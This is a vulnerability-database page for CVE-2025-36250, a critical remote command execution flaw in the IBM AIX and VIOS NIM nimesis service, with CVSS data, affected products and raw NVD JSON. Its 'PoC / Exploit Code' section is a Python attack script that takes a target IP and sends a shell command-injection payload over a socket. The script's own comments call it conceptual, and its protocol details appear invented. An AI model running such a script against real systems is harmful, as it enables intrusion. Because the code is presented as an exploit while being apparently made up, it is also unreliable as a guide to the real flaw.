Security Vulnerability Report
中文
CVE-2025-36250 CVSS 10.0 CRITICAL

CVE-2025-36250

Published: 2025-11-13 22:15:51
Last Modified: 2025-11-19 22:08:58

Description

IBM AIX 7.2, and 7.3 and IBM VIOS 3.1, and 4.1 NIM server (formerly known as NIM master) service (nimesis) could allow a remote attacker to execute arbitrary commands due to improper process controls.  This addresses additional attack vectors for a vulnerability that was previously addressed in CVE-2024-56346.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ibm:vios:3.1.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:vios:4.1.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:ibm:aix:7.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:ibm:aix:7.3:*:*:*:*:*:*:* - VULNERABLE
IBM AIX 7.2 (所有版本)
IBM AIX 7.3 (所有版本)
IBM VIOS 3.1 (所有版本)
IBM VIOS 4.1 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-36250 PoC - IBM AIX NIM Server nimesis Remote Code Execution # Note: This is a conceptual PoC for educational purposes only import socket import struct import sys def create_nim_packet(command_type, payload): """Create a NIM protocol packet with malicious payload""" header = struct.pack('>I', command_type) # Command type header += struct.pack('>I', len(payload)) # Payload length return header + payload.encode('utf-8') def exploit_nimesis(target_ip, target_port=9999): """ Exploit CVE-2025-36250 This PoC demonstrates the attack concept for the NIM nimesis vulnerability """ # Malicious command injection payload # The actual exploit would target specific protocol weaknesses cmd = "$(/bin/bash -c 'whoami > /tmp/pwned')" # NIM_OP_OBJECT defines an object operation packet = create_nim_packet(0x00000001, cmd) try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(30) sock.connect((target_ip, target_port)) print(f"[*] Sending exploit payload to {target_ip}:{target_port}") sock.send(packet) response = sock.recv(1024) print(f"[+] Received response: {response}") # Check if exploit was successful sock.send(b"check_result /tmp/pwned") result = sock.recv(1024) if b"root" in result: print("[+] Exploit successful! Remote code execution achieved.") sock.close() return True except Exception as e: print(f"[-] Exploit failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip>") sys.exit(1) target = sys.argv[1] exploit_nimesis(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36250", "sourceIdentifier": "[email protected]", "published": "2025-11-13T22:15:50.887", "lastModified": "2025-11-19T22:08:58.157", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM AIX 7.2, and 7.3 and IBM VIOS 3.1, and 4.1 NIM server (formerly known as NIM master) service (nimesis) could allow a remote attacker to execute arbitrary commands due to improper process controls.  This addresses additional attack vectors for a vulnerability that was previously addressed in CVE-2024-56346."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-114"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:vios:3.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "3939ADB4-5177-45C2-9C29-932E81D27F9E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:vios:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "AB8BDD68-E15D-460F-855E-72DF774D6A1F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:ibm:aix:7.2:*:*:*:*:*:*:*", "matchCriteriaId": "6791504A-A48A-4ED0-94AF-4C8A3B91516F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:ibm:aix:7.3:*:*:*:*:*:*:*", "matchCriteriaId": "35DF3DE0-1AE4-4B25-843F-BC08DBBFDF78"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7251173", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}